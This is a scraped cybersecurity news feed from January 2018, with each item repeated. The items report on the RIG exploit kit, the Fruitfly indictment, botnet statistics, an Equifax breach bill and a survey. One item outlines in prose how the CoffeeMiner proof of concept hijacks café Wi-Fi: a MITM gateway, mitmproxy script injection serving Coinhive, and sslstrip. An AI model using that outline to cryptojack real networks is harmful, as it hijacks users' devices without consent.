Info Security

Subscribe to Info Security  feed
Updated: 1 hour 25 min ago

RIG EK Activity Declines in Q4

Thu, 01/11/2018 - 20:09
RIG EK Activity Declines in Q4

The RIG exploit kit (EK) has hung onto its lead as the most active EK out there this quarter, even though overall volume of RIG traffic was down from Q3.

According to the latest stats from Zscaler, RIG, which took the lion’s share of the activity after the demise of the Angler and Neutrino EKs, declined significantly in November and December, even though it continues to install ransomware, banking Trojans and cryptocurrency mining software on vulnerable systems at a greater rate than the competition.

Global distribution of RIG activity has also shifted, the firm said in its report: “For the last quarter, virtually all observed RIG traffic has been within the United States, Russia and Japan. This was unexpected, as previous analyses had shown an appreciable amount of activity in Europe, the rest of the Americas, and Southeast Asia.”

Among the number of concurrent RIG campaigns this year, the “Seamless” campaign, primarily responsible for infecting victims with the Ramnit banking infostealer, has been ongoing since early last year. RIG is also distributing coin-mining packages that typically mine alternative cryptocurrencies such as Monero, which have a greater emphasis on privacy and anonymity than Bitcoin. However, earlier this fall Zscaler researchers observed a one-off RIG campaign that used a different malicious redirect structure and infected victims with the Dofoil Trojan and Bitcoin Miner mining tool.

Other active exploit kits in the quarter include the Terror EK, a more recent exploit kit discovered in late 2016. It was formed as an amalgamation of several active exploit kits, including the Sundown EK. The majority of detected Terror EK cycles in the fourth quarter were delivered via malvertising campaigns using the Propeller Ads network.

A brand-new exploit kit that shares code with Terror EK and uses the same URL pattern, Disdain EK, was also discovered making the rounds.  

“Disdain is currently operating at very low activity, but has been observed distributing the Kasidet infostealer,” Zscaler said.

Also, the venerable Magnitude EK is still kicking. One of the longest-running exploit kits, first launched in 2013, this exploit kit has seen much lower volume activity in recent years and now primarily targets Southeast Asian countries and South Korea with malvertising campaigns.

Despite the decrease in activity, the danger is still very real and present.

“Exploit kits pose a significant threat to users during simple web browsing,” Zscaler noted. “In the case of ransomware infections, the result could be the inability of a user to access his or her files. The techniques exploit kit authors use to hide their activities are frequently changing, and security researchers work hard to analyze and block these new threats.”

To help avoid infections such as these, users should always block untrusted third-party scripts and resources,and avoid clicking on suspicious advertisements. 

Categories: Cyber Risk News

RIG EK Activity Declines in Q4

Thu, 01/11/2018 - 20:09
RIG EK Activity Declines in Q4

The RIG exploit kit (EK) has hung onto its lead as the most active EK out there this quarter, even though overall volume of RIG traffic was down from Q3.

According to the latest stats from Zscaler, RIG, which took the lion’s share of the activity after the demise of the Angler and Neutrino EKs, declined significantly in November and December, even though it continues to install ransomware, banking Trojans and cryptocurrency mining software on vulnerable systems at a greater rate than the competition.

Global distribution of RIG activity has also shifted, the firm said in its report: “For the last quarter, virtually all observed RIG traffic has been within the United States, Russia and Japan. This was unexpected, as previous analyses had shown an appreciable amount of activity in Europe, the rest of the Americas, and Southeast Asia.”

Among the number of concurrent RIG campaigns this year, the “Seamless” campaign, primarily responsible for infecting victims with the Ramnit banking infostealer, has been ongoing since early last year. RIG is also distributing coin-mining packages that typically mine alternative cryptocurrencies such as Monero, which have a greater emphasis on privacy and anonymity than Bitcoin. However, earlier this fall Zscaler researchers observed a one-off RIG campaign that used a different malicious redirect structure and infected victims with the Dofoil Trojan and Bitcoin Miner mining tool.

Other active exploit kits in the quarter include the Terror EK, a more recent exploit kit discovered in late 2016. It was formed as an amalgamation of several active exploit kits, including the Sundown EK. The majority of detected Terror EK cycles in the fourth quarter were delivered via malvertising campaigns using the Propeller Ads network.

A brand-new exploit kit that shares code with Terror EK and uses the same URL pattern, Disdain EK, was also discovered making the rounds.  

“Disdain is currently operating at very low activity, but has been observed distributing the Kasidet infostealer,” Zscaler said.

Also, the venerable Magnitude EK is still kicking. One of the longest-running exploit kits, first launched in 2013, this exploit kit has seen much lower volume activity in recent years and now primarily targets Southeast Asian countries and South Korea with malvertising campaigns.

Despite the decrease in activity, the danger is still very real and present.

“Exploit kits pose a significant threat to users during simple web browsing,” Zscaler noted. “In the case of ransomware infections, the result could be the inability of a user to access his or her files. The techniques exploit kit authors use to hide their activities are frequently changing, and security researchers work hard to analyze and block these new threats.”

To help avoid infections such as these, users should always block untrusted third-party scripts and resources,and avoid clicking on suspicious advertisements. 

Categories: Cyber Risk News

Mueller Appoints Cyber Expert to Trump Probe Team

Thu, 01/11/2018 - 12:03
Mueller Appoints Cyber Expert to Trump Probe Team

The high-profile investigation into possible collusion between the Trump election campaign team and the Russian government has been given added weight by the appointment of a prosecutor well versed in cybersecurity, it has emerged.

Ryan Dickey was actually appointed by special counsel Robert Mueller in early November, joining the growing 16-strong team from Department of Justice Computer Crime and Intellectual Property Section.

Dickey joins a team well-versed in public corruption, money laundering and fraud, but his expertise in cybercrime signals the growing importance of this strand of the investigation.

He’s participated in several high-profile cyber-cases including one against controversial file-sharing site Megaupload, and the investigation of notorious Romanian hacker Guccifer, who was finally arrested in 2014.

It was this investigation that revealed that Hillary Clinton had been using a private email server for official business when secretary of state – a fact not lost on the Russian authorities. The online moniker “Guccifer 2.0” was given to the ‘individual’ who leaked damaging Democratic Party emails ahead of the 2016 presidential election.

US intelligence believes this was the work of Russian intelligence. The job now ahead of Mueller and his team is proving the Trump team colluded with Moscow to influence the election.

In many ways, it’s surprising that a cybersecurity expert has up until now not been appointed to the investigation, given the importance of this strand of the inquiry.

It’s still unclear what the outcome will be, although legal experts have told the Washington Post that prosecutors could pursue a charge of conspiracy to violate the Computer Fraud and Abuse Act, if they can prove collusion in the Guccifer 2.0 operation to influence the election result.

For his part, President Trump has continually protested his innocence, describing the investigation as “the single greatest Witch Hunt in American history,” while Republican lawmakers have begun to grumble that Mueller’s team is filled with Democrat-leaning lawyers.

Categories: Cyber Risk News

Mueller Appoints Cyber Expert to Trump Probe Team

Thu, 01/11/2018 - 12:03
Mueller Appoints Cyber Expert to Trump Probe Team

The high-profile investigation into possible collusion between the Trump election campaign team and the Russian government has been given added weight by the appointment of a prosecutor well versed in cybersecurity, it has emerged.

Ryan Dickey was actually appointed by special counsel Robert Mueller in early November, joining the growing 16-strong team from Department of Justice Computer Crime and Intellectual Property Section.

Dickey joins a team well-versed in public corruption, money laundering and fraud, but his expertise in cybercrime signals the growing importance of this strand of the investigation.

He’s participated in several high-profile cyber-cases including one against controversial file-sharing site Megaupload, and the investigation of notorious Romanian hacker Guccifer, who was finally arrested in 2014.

It was this investigation that revealed that Hillary Clinton had been using a private email server for official business when secretary of state – a fact not lost on the Russian authorities. The online moniker “Guccifer 2.0” was given to the ‘individual’ who leaked damaging Democratic Party emails ahead of the 2016 presidential election.

US intelligence believes this was the work of Russian intelligence. The job now ahead of Mueller and his team is proving the Trump team colluded with Moscow to influence the election.

In many ways, it’s surprising that a cybersecurity expert has up until now not been appointed to the investigation, given the importance of this strand of the inquiry.

It’s still unclear what the outcome will be, although legal experts have told the Washington Post that prosecutors could pursue a charge of conspiracy to violate the Computer Fraud and Abuse Act, if they can prove collusion in the Guccifer 2.0 operation to influence the election result.

For his part, President Trump has continually protested his innocence, describing the investigation as “the single greatest Witch Hunt in American history,” while Republican lawmakers have begun to grumble that Mueller’s team is filled with Democrat-leaning lawyers.

Categories: Cyber Risk News

Cyber Security Challenge UK Appoints New CEO

Thu, 01/11/2018 - 11:53
Cyber Security Challenge UK Appoints New CEO

Cyber Security Challenge UK today announced the appointment of a new chief executive following the death of former CEO Stephanie Daman, who passed away in June last year after a long battle with cancer.

Colin Lobley, who came through a thorough selection process of over 70 candidates, will now take up the role, joining from DXC Technology’s (formerly Hewlett Packard Enterprise), Security Services division where he was general manager, UK, Ireland, Middle East. Lobley will bring with him expertise in working with both public and private sector organizations.

“There are lots of exciting possibilities to diversify and expand this national initiative, so we can enhance the positive impact we have on the UK’s cyber resilience,” he said. “It would be fantastic if we could achieve such a utopian vision as having eradicated all security weaknesses in the cyber world...but realistically, if I go home every day knowing I have done something, directly or indirectly, to encourage people into the field of cyber, to enhance the knowledge of those in or entering the field, or to educate someone about cybersecurity and start to close those gaps; I'll be happy.”

That’s exactly why I am delighted to be joining the fantastic, passionate team at Cyber Security Challenge UK, Lobley added, helping to make a real difference and building upon the wonderful efforts of the late Stephanie Daman.

“I fully believe that the UK cyber industry can go from strength to strength to become ever more prominent on the world stage,” he continued. “But to achieve this, it is essential that we nurture new talent, so we can meet the evolving market demands.”

Dr Robert Nowill, chairman of Cyber Security Challenge UK, said: “With his background, Colin fits the role very well as we forge the way ahead for our organization; developing our offering further whilst scaling up what we do to seek out as much new talent and staying as inclusive as possible. The Board and I also are extremely grateful for the work Nigel Harrison has done as Acting CEO for much of last year. We are pleased that Nigel continues as an Executive Director of The Challenge to help drive this exciting future.”

Categories: Cyber Risk News

Cyber Security Challenge UK Appoints New CEO

Thu, 01/11/2018 - 11:53
Cyber Security Challenge UK Appoints New CEO

Cyber Security Challenge UK today announced the appointment of a new chief executive following the death of former CEO Stephanie Daman, who passed away in June last year after a long battle with cancer.

Colin Lobley, who came through a thorough selection process of over 70 candidates, will now take up the role, joining from DXC Technology’s (formerly Hewlett Packard Enterprise), Security Services division where he was general manager, UK, Ireland, Middle East. Lobley will bring with him expertise in working with both public and private sector organizations.

“There are lots of exciting possibilities to diversify and expand this national initiative, so we can enhance the positive impact we have on the UK’s cyber resilience,” he said. “It would be fantastic if we could achieve such a utopian vision as having eradicated all security weaknesses in the cyber world...but realistically, if I go home every day knowing I have done something, directly or indirectly, to encourage people into the field of cyber, to enhance the knowledge of those in or entering the field, or to educate someone about cybersecurity and start to close those gaps; I'll be happy.”

That’s exactly why I am delighted to be joining the fantastic, passionate team at Cyber Security Challenge UK, Lobley added, helping to make a real difference and building upon the wonderful efforts of the late Stephanie Daman.

“I fully believe that the UK cyber industry can go from strength to strength to become ever more prominent on the world stage,” he continued. “But to achieve this, it is essential that we nurture new talent, so we can meet the evolving market demands.”

Dr Robert Nowill, chairman of Cyber Security Challenge UK, said: “With his background, Colin fits the role very well as we forge the way ahead for our organization; developing our offering further whilst scaling up what we do to seek out as much new talent and staying as inclusive as possible. The Board and I also are extremely grateful for the work Nigel Harrison has done as Acting CEO for much of last year. We are pleased that Nigel continues as an Executive Director of The Challenge to help drive this exciting future.”

Categories: Cyber Risk News

Fruitfly Malware Creator Allegedly Spied on Victims for 13 Years

Thu, 01/11/2018 - 10:20
Fruitfly Malware Creator Allegedly Spied on Victims for 13 Years

An Ohio computer programmer has been indicted for a 13-year malware campaign during which he stole sensitive personal data (PII), eavesdropped on conversations and even produced child pornography.

Phillip Durachinsky, 28, of North Royalton, Ohio, is facing 16 counts of Computer Fraud and Abuse Act violations, Wiretap Act violations, production of child pornography and aggravated identity theft.

He’s said to have developed the malware known as Fruitfly, which allowed him to remotely access and control victim machines, although it’s not clear how he installed the malware.

This allegedly allowed him to steal reams of sensitive PII including online credentials, tax records, medical records, photographs, banking records and internet searches.

He’s also accused of taking screenshots, logging keystrokes and recording audio/video via the victim machines’ webcams and microphones.

This allegedly allowed Durachinsky to watch and listen to victims without their knowledge. The malware also alerted him when users typed in words associated with pornography, according to the Department of Justice.

The indictment claims he saved millions of images and kept detailed notes of what he saw.

Durachinsky is not only accused of snooping on home users. The DoJ claimed he also installed Fruitfly on computers in private enterprises, schools, a police department and even the government, including one machine at a subsidiary of the US Department of Energy.

“Durachinsky is alleged to have utilized his sophisticated cyber skills with ill intent, compromising numerous systems and individual computers,” said special agent in charge Stephen Anthony.

“The FBI would like to commend the compromised entities that brought this to the attention of law enforcement authorities. It is this kind of collaboration that has enabled authorities to bring this cyber hacker to justice.”

The case answers many questions raised by security researchers when they first discovered Fruitfly, with some even claiming it could be the work of a nation state.

Categories: Cyber Risk News

Fruitfly Malware Creator Allegedly Spied on Victims for 13 Years

Thu, 01/11/2018 - 10:20
Fruitfly Malware Creator Allegedly Spied on Victims for 13 Years

An Ohio computer programmer has been indicted for a 13-year malware campaign during which he stole sensitive personal data (PII), eavesdropped on conversations and even produced child pornography.

Phillip Durachinsky, 28, of North Royalton, Ohio, is facing 16 counts of Computer Fraud and Abuse Act violations, Wiretap Act violations, production of child pornography and aggravated identity theft.

He’s said to have developed the malware known as Fruitfly, which allowed him to remotely access and control victim machines, although it’s not clear how he installed the malware.

This allegedly allowed him to steal reams of sensitive PII including online credentials, tax records, medical records, photographs, banking records and internet searches.

He’s also accused of taking screenshots, logging keystrokes and recording audio/video via the victim machines’ webcams and microphones.

This allegedly allowed Durachinsky to watch and listen to victims without their knowledge. The malware also alerted him when users typed in words associated with pornography, according to the Department of Justice.

The indictment claims he saved millions of images and kept detailed notes of what he saw.

Durachinsky is not only accused of snooping on home users. The DoJ claimed he also installed Fruitfly on computers in private enterprises, schools, a police department and even the government, including one machine at a subsidiary of the US Department of Energy.

“Durachinsky is alleged to have utilized his sophisticated cyber skills with ill intent, compromising numerous systems and individual computers,” said special agent in charge Stephen Anthony.

“The FBI would like to commend the compromised entities that brought this to the attention of law enforcement authorities. It is this kind of collaboration that has enabled authorities to bring this cyber hacker to justice.”

The case answers many questions raised by security researchers when they first discovered Fruitfly, with some even claiming it could be the work of a nation state.

Categories: Cyber Risk News

Equifax Would Have Paid $1.5bn Under New US Breach Laws

Thu, 01/11/2018 - 09:46
Equifax Would Have Paid $1.5bn Under New US Breach Laws

Senators have proposed new legislation which would impose strict liability penalties on credit agencies (CRAs) in the event of a data breach.

The Data Breach Prevention and Compensation Act is designed to make the big CRAs more accountable, following a damaging breach at Equifax last year which affected 145.5m Americans and 700,000 Brits.

The act would establish an Office of Cybersecurity at regulator the FTC which would have responsibility for annual inspections and supervision of security-related issues.

Most notably, it would impose mandatory financial penalties starting at $100 for every customer who has one piece of personally identifiable information (PII) compromised, with $50 per additional piece of PII. Half of the money collected would be used to compensate the victims.

These fines could rise even higher if there’s evidence of inadequate cybersecurity or delayed breach reporting.

Under the new legislation, Equifax would have been forced to pay an estimated $1.5bn fine following its September 2017 breach, according to senator Elizabeth Warren.

"The financial incentives here are all out of whack – Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach," she said in a statement.

"Our bill imposes massive and mandatory penalties for data breaches at companies like Equifax – and provides robust compensation for affected consumers – which will put money back into people’s pockets and help stop these kinds of breaches from happening again."

Although the US led the way globally with mandatory breach reporting laws a few years back, it is the EU GDPR which now sets the standard. Under the new data protection regulation, Equifax would likely have seen significant fines, due to the number of UK consumers affected.

Consumer and security groups appear to support the legislation.

“This bill establishes much-needed protections for data security for the credit bureaus,” said National Consumer Law Center staff attorney, Chi Chi Wu.

“It also imposes real and meaningful penalties when credit bureaus, entrusted with our most sensitive financial information, break that trust.”

Categories: Cyber Risk News

Equifax Would Have Paid $1.5bn Under New US Breach Laws

Thu, 01/11/2018 - 09:46
Equifax Would Have Paid $1.5bn Under New US Breach Laws

Senators have proposed new legislation which would impose strict liability penalties on credit agencies (CRAs) in the event of a data breach.

The Data Breach Prevention and Compensation Act is designed to make the big CRAs more accountable, following a damaging breach at Equifax last year which affected 145.5m Americans and 700,000 Brits.

The act would establish an Office of Cybersecurity at regulator the FTC which would have responsibility for annual inspections and supervision of security-related issues.

Most notably, it would impose mandatory financial penalties starting at $100 for every customer who has one piece of personally identifiable information (PII) compromised, with $50 per additional piece of PII. Half of the money collected would be used to compensate the victims.

These fines could rise even higher if there’s evidence of inadequate cybersecurity or delayed breach reporting.

Under the new legislation, Equifax would have been forced to pay an estimated $1.5bn fine following its September 2017 breach, according to senator Elizabeth Warren.

"The financial incentives here are all out of whack – Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach," she said in a statement.

"Our bill imposes massive and mandatory penalties for data breaches at companies like Equifax – and provides robust compensation for affected consumers – which will put money back into people’s pockets and help stop these kinds of breaches from happening again."

Although the US led the way globally with mandatory breach reporting laws a few years back, it is the EU GDPR which now sets the standard. Under the new data protection regulation, Equifax would likely have seen significant fines, due to the number of UK consumers affected.

Consumer and security groups appear to support the legislation.

“This bill establishes much-needed protections for data security for the credit bureaus,” said National Consumer Law Center staff attorney, Chi Chi Wu.

“It also imposes real and meaningful penalties when credit bureaus, entrusted with our most sensitive financial information, break that trust.”

Categories: Cyber Risk News

Bad Botnet Growth Skyrockets in 2017

Wed, 01/10/2018 - 19:00
Bad Botnet Growth Skyrockets in 2017

Bad bots are big – and getting bigger. There was a 37% increase in botnet command-and-control (C&C) listings in 2017, with the majority (68%) of them being hosted on servers run by threat actors.

According to the Spamhaus Botnet Threat Report 2017, the company’s malware division identified and issued Spamhaus Block List (SBL) listings for more than 9,500 botnet C&C servers on 1,122 different networks. In 2017, nearly every seventh SBL listing that Spamhaus issued was for a botnet controller.

Of course, not all botnets are bad bots; but Spamhaus's Botnet Controller List (BCL), which exclusively lists IP addresses of botnet servers set up and operated by cybercriminals, saw listings increase by more than 40% in one year (and more than 90% since 2014). On average, Spamhaus is issuing between 600 and 700 BCL listings per month.

The reality of the situation is probably much worse: The statistics exclude botnet controllers that are hosted on anonymization networks like Tor.

Botnet C&C controllers are used by cybercriminals to send out spam and ransomware, launch distributed denial of service (DDoS) attacks, commit e-banking fraud or click fraud or mine cryptocurrencies such as Bitcoin and Monero. With the rise of the internet of things (IoT)–enslaved class of devices, such as smart thermostats, webcams or network attached storage devices (NAS), controller palettes have continued to get more diverse – and numerous.

In fact, the number of IoT botnet controllers alone more than doubled from 393 in 2016 to 943 in 2017.

“Looking forward to 2018, there is no sign that the number of cyber threats will decrease,” Spamhaus noted in its report. “The big increase of IoT threats in 2017 is very likely to continue in 2018. We are sure that securing and protecting IoT devices will be a core topic in 2018.”

This will likely correspond with an uptick in DDoS attacks.

"The latest 2017 threat report from Spamhaus shows a notable uptick in detected botnets, compared to 2016,” said Stephanie Weagle, vice president of marketing at DDoS specialist Corero Network Security, via email. “The increase is no surprise, given the recent trend of leveraging poorly secured IoT devices, and is only set to increase given the increasing sophistication with which devices are being compromised and recruited. Combined with new DDoS attack vectors and techniques, such as the recent appearance of so-called pulse-wave attacks, the risk of being hit by a damaging attack for those not properly protected is higher than ever."

The report also uncovered that, looking at the geographic location of the botnet controllers, the top botnet hosting country is the US, followed by Russia. Also, when it comes to the kinds of malware associated with the botnet controllers, the Pony downloader topped the list, with 1,015 associated C&Cs. Generic IoT malware came in second; and the Loki credential stealer/banking Trojan took third place with 933 C&Cs.

Interestingly, while Locky and TorrentLocker where omnipresent in 2016, these two ransomware families did not make it into the top 20 in 2017. They have been replaced by the Cerber ransomware, which claimed the No. 7 spot, with 293 C&Cs.

Categories: Cyber Risk News

Bad Botnet Growth Skyrockets in 2017

Wed, 01/10/2018 - 19:00
Bad Botnet Growth Skyrockets in 2017

Bad bots are big – and getting bigger. There was a 37% increase in botnet command-and-control (C&C) listings in 2017, with the majority (68%) of them being hosted on servers run by threat actors.

According to the Spamhaus Botnet Threat Report 2017, the company’s malware division identified and issued Spamhaus Block List (SBL) listings for more than 9,500 botnet C&C servers on 1,122 different networks. In 2017, nearly every seventh SBL listing that Spamhaus issued was for a botnet controller.

Of course, not all botnets are bad bots; but Spamhaus's Botnet Controller List (BCL), which exclusively lists IP addresses of botnet servers set up and operated by cybercriminals, saw listings increase by more than 40% in one year (and more than 90% since 2014). On average, Spamhaus is issuing between 600 and 700 BCL listings per month.

The reality of the situation is probably much worse: The statistics exclude botnet controllers that are hosted on anonymization networks like Tor.

Botnet C&C controllers are used by cybercriminals to send out spam and ransomware, launch distributed denial of service (DDoS) attacks, commit e-banking fraud or click fraud or mine cryptocurrencies such as Bitcoin and Monero. With the rise of the internet of things (IoT)–enslaved class of devices, such as smart thermostats, webcams or network attached storage devices (NAS), controller palettes have continued to get more diverse – and numerous.

In fact, the number of IoT botnet controllers alone more than doubled from 393 in 2016 to 943 in 2017.

“Looking forward to 2018, there is no sign that the number of cyber threats will decrease,” Spamhaus noted in its report. “The big increase of IoT threats in 2017 is very likely to continue in 2018. We are sure that securing and protecting IoT devices will be a core topic in 2018.”

This will likely correspond with an uptick in DDoS attacks.

"The latest 2017 threat report from Spamhaus shows a notable uptick in detected botnets, compared to 2016,” said Stephanie Weagle, vice president of marketing at DDoS specialist Corero Network Security, via email. “The increase is no surprise, given the recent trend of leveraging poorly secured IoT devices, and is only set to increase given the increasing sophistication with which devices are being compromised and recruited. Combined with new DDoS attack vectors and techniques, such as the recent appearance of so-called pulse-wave attacks, the risk of being hit by a damaging attack for those not properly protected is higher than ever."

The report also uncovered that, looking at the geographic location of the botnet controllers, the top botnet hosting country is the US, followed by Russia. Also, when it comes to the kinds of malware associated with the botnet controllers, the Pony downloader topped the list, with 1,015 associated C&Cs. Generic IoT malware came in second; and the Loki credential stealer/banking Trojan took third place with 933 C&Cs.

Interestingly, while Locky and TorrentLocker where omnipresent in 2016, these two ransomware families did not make it into the top 20 in 2017. They have been replaced by the Cerber ransomware, which claimed the No. 7 spot, with 293 C&Cs.

Categories: Cyber Risk News

CoffeeMiner Forces Coffee Shop Visitors to Mine for Monero

Wed, 01/10/2018 - 18:30
CoffeeMiner Forces Coffee Shop Visitors to Mine for Monero

Surreptitious crypto-mining using unsuspecting victims’ computers has become a rapidly proliferating phenomenon – and now it has collided with coffee shop Wi-Fi hijacking.

A software developer known as Arnau Code has developed a proof-of-concept for a man-in-the-middle (MiTM) attack, for use in coffee shops and other places where legions of students and teleworkers take advantage of free Wi-Fi. It shows how the bad guys can gain access not just to one victim’s CPU resources to mine for virtual currency but to all of the compute power connected to that particular Wi-Fi network, all at once.

“Some weeks ago I read about this Starbucks case where hackers hijacked laptops on the WiFi network to use the devices computing power to mine cryptocurrency, and I thought it might be interesting perform the attack in a different way,” the developer explained in a blog, with the disclaimer that his research is “strictly for academic purposes.”

He added, “The goal of this article, is to explain how can be done the attack of MITM...to inject some javascript in the html pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.”

Appropriately named CoffeeMiner, the script allows for an autonomous attack on the Wi-Fi network to do just that. It’s the result of a multistep – but not challenging, according to Code – process.

First, CoffeeMiner intercepts the traffic flowing back and forth between the users and the router by setting up a virtual gateway. Then, using the “mitmproxy” software tool, CoffeeMiner injects a line of JavaScript code into the HTML pages that coffee shop denizens are visiting. The code in turn connects to a simple HTTP server running on an attacker machine, which then serves up the Coinhive crypto-miner to victims. Coinhive, which allows visited websites to mine for the Monero cryptocurrency, has gained notoriety, thanks to cybercriminals abusing it.

“CoinHive miner makes sense when user stays in a website for mid- [to] long term sessions,” the developer said. “So, for example, for a website where the users average session is around 40 seconds, it doesn’t make much sense. In our case, as we will inject the crypto miner into each one of the HTML pages that victims request, [so we] will have long term sessions to calculate hashes to mine Monero.”

Once created as a fully formed weapon, CoffeeMiner runs autonomously, as a sort of set-it-and-forget-it moneymaker.

Code also offered helpful suggestions for maximizing CoffeeMiner’s potential, including using a powerful Wi-Fi antenna, “to reach better all the physical zone,” and adding a piece of code, “sslstrip,” to make sure the injection will also work with websites that the user can request over HTTPS.

As far as protecting oneself against such an attack, which has the potential to slow victim machines down so far as to be virtually unusable, Scott Petry, CEO and co-founder of Authentic8, compared it to taking basic flu-season precautions.

“We don't even touch public doorknobs without a paper towel or a squirt of Purell,” he said via email. “Why on Earth would anyone freely connect to a public Wi-Fi network? There's no surprise in this story – it’s how the internet works. The surprise is that people are still exposing themselves to these exploits. Someday soon we'll look back in shock on how careless we were on the internet.”

Categories: Cyber Risk News

CoffeeMiner Forces Coffee Shop Visitors to Mine for Monero

Wed, 01/10/2018 - 18:30
CoffeeMiner Forces Coffee Shop Visitors to Mine for Monero

Surreptitious crypto-mining using unsuspecting victims’ computers has become a rapidly proliferating phenomenon – and now it has collided with coffee shop Wi-Fi hijacking.

A software developer known as Arnau Code has developed a proof-of-concept for a man-in-the-middle (MiTM) attack, for use in coffee shops and other places where legions of students and teleworkers take advantage of free Wi-Fi. It shows how the bad guys can gain access not just to one victim’s CPU resources to mine for virtual currency but to all of the compute power connected to that particular Wi-Fi network, all at once.

“Some weeks ago I read about this Starbucks case where hackers hijacked laptops on the WiFi network to use the devices computing power to mine cryptocurrency, and I thought it might be interesting perform the attack in a different way,” the developer explained in a blog, with the disclaimer that his research is “strictly for academic purposes.”

He added, “The goal of this article, is to explain how can be done the attack of MITM...to inject some javascript in the html pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.”

Appropriately named CoffeeMiner, the script allows for an autonomous attack on the Wi-Fi network to do just that. It’s the result of a multistep – but not challenging, according to Code – process.

First, CoffeeMiner intercepts the traffic flowing back and forth between the users and the router by setting up a virtual gateway. Then, using the “mitmproxy” software tool, CoffeeMiner injects a line of JavaScript code into the HTML pages that coffee shop denizens are visiting. The code in turn connects to a simple HTTP server running on an attacker machine, which then serves up the Coinhive crypto-miner to victims. Coinhive, which allows visited websites to mine for the Monero cryptocurrency, has gained notoriety, thanks to cybercriminals abusing it.

“CoinHive miner makes sense when user stays in a website for mid- [to] long term sessions,” the developer said. “So, for example, for a website where the users average session is around 40 seconds, it doesn’t make much sense. In our case, as we will inject the crypto miner into each one of the HTML pages that victims request, [so we] will have long term sessions to calculate hashes to mine Monero.”

Once created as a fully formed weapon, CoffeeMiner runs autonomously, as a sort of set-it-and-forget-it moneymaker.

Code also offered helpful suggestions for maximizing CoffeeMiner’s potential, including using a powerful Wi-Fi antenna, “to reach better all the physical zone,” and adding a piece of code, “sslstrip,” to make sure the injection will also work with websites that the user can request over HTTPS.

As far as protecting oneself against such an attack, which has the potential to slow victim machines down so far as to be virtually unusable, Scott Petry, CEO and co-founder of Authentic8, compared it to taking basic flu-season precautions.

“We don't even touch public doorknobs without a paper towel or a squirt of Purell,” he said via email. “Why on Earth would anyone freely connect to a public Wi-Fi network? There's no surprise in this story – it’s how the internet works. The surprise is that people are still exposing themselves to these exploits. Someday soon we'll look back in shock on how careless we were on the internet.”

Categories: Cyber Risk News

As Cloud Looms, Security Tops IT Resilience Investment

Wed, 01/10/2018 - 17:18
As Cloud Looms, Security Tops IT Resilience Investment

When it comes to investments in IT resilience, cybersecurity initiatives top the to-do list for most IT departments, as cloud leads the way as the No. 1 threat concern.

According to Syncsort’s 2018 State of Resilience report, which surveyed 5,632 IT professionals globally, ongoing, high-profile hacking attacks, data breaches, disruptive natural disasters and escalating storage and data accessibility needs are top concerns for most businesses. Overall, security is the top initiative that most companies will pursue in the next 24 months (49%). The majority of professionals chose virus protection (71%), malware protection (67%), patch management (53%), and intrusion detection and prevention (IDP, 52%) as their top organizational investments in security today.

IT pros see cloud as the top security challenge: The report found that IT leaders are entrusting critical applications to the cloud, but with concerns. About 43% identify it as their top security challenge for the coming year.

“Certainly, the shared resource pools and always-on features of cloud have introduced the possibility of new security breaches – including data loss, weak identity management, insecure APIs, denial of service attacks, account hijacking and advanced persistent attacks, which infiltrate systems over a period of time,” the firm said in the report. 

The second greatest perceived challenge for IT departments is the increasing sophistication of attacks (37%). “Cunning criminals have sharpened their craft, conducting exploratory raids over months, invading systems, hiding their tracks, and deploying malware that can fool customers with bogus messages or extract and steal valuable data – the lifeblood of most companies.”

Ransomware meanwhile appeared as the No. 3 challenge confronting respondents, though Syncsort’s analysis was dubious as to the actual impact: “IT professionals are naturally aware of this phenomenon, as a result of worldwide media coverage. Yet, a considerable majority of professionals in this study had never been attacked by ransomware or were not aware that they had been; a miniscule number had paid to get data back, as mentioned in a subsequent section of this report. It remains to be seen whether ransomware is the flavor of the moment or will be a recurring trend.”

Despite these concerns, internal security audits are infrequent, the report found. Nearly two-thirds of companies perform security audits on their systems, but the most common schedule was to do it on an annual basis (39%). Another 10% of respondents audit every two years or more, which, given an ever-changing IT environment, could expose a company to risk.

The report also found that data sharing is seen as critical but challenging. About half (53%) of companies surveyed have multiple databases and share data to improve business intelligence, largely through scripting (42%), followed by backup/restore/snapshot processes and FTP/SCP/file transfer (38% each). The average company uses two different methods, adding to the complexity. In turn, this bolsters security concerns.

“IT leaders are under immense pressure to provide an enterprise infrastructure that can sustain severe threats and secure vital information while enabling data accessibility and business intelligence,” said Terry Plath, vice president, Global Services, Syncsort. “Business resilience requires the right mix of planning and technology, and this survey did a thorough job of uncovering how businesses are tackling this increasingly complex and multi-faceted challenge.”

Categories: Cyber Risk News

As Cloud Looms, Security Tops IT Resilience Investment

Wed, 01/10/2018 - 17:18
As Cloud Looms, Security Tops IT Resilience Investment

When it comes to investments in IT resilience, cybersecurity initiatives top the to-do list for most IT departments, as cloud leads the way as the No. 1 threat concern.

According to Syncsort’s 2018 State of Resilience report, which surveyed 5,632 IT professionals globally, ongoing, high-profile hacking attacks, data breaches, disruptive natural disasters and escalating storage and data accessibility needs are top concerns for most businesses. Overall, security is the top initiative that most companies will pursue in the next 24 months (49%). The majority of professionals chose virus protection (71%), malware protection (67%), patch management (53%), and intrusion detection and prevention (IDP, 52%) as their top organizational investments in security today.

IT pros see cloud as the top security challenge: The report found that IT leaders are entrusting critical applications to the cloud, but with concerns. About 43% identify it as their top security challenge for the coming year.

“Certainly, the shared resource pools and always-on features of cloud have introduced the possibility of new security breaches – including data loss, weak identity management, insecure APIs, denial of service attacks, account hijacking and advanced persistent attacks, which infiltrate systems over a period of time,” the firm said in the report. 

The second greatest perceived challenge for IT departments is the increasing sophistication of attacks (37%). “Cunning criminals have sharpened their craft, conducting exploratory raids over months, invading systems, hiding their tracks, and deploying malware that can fool customers with bogus messages or extract and steal valuable data – the lifeblood of most companies.”

Ransomware meanwhile appeared as the No. 3 challenge confronting respondents, though Syncsort’s analysis was dubious as to the actual impact: “IT professionals are naturally aware of this phenomenon, as a result of worldwide media coverage. Yet, a considerable majority of professionals in this study had never been attacked by ransomware or were not aware that they had been; a miniscule number had paid to get data back, as mentioned in a subsequent section of this report. It remains to be seen whether ransomware is the flavor of the moment or will be a recurring trend.”

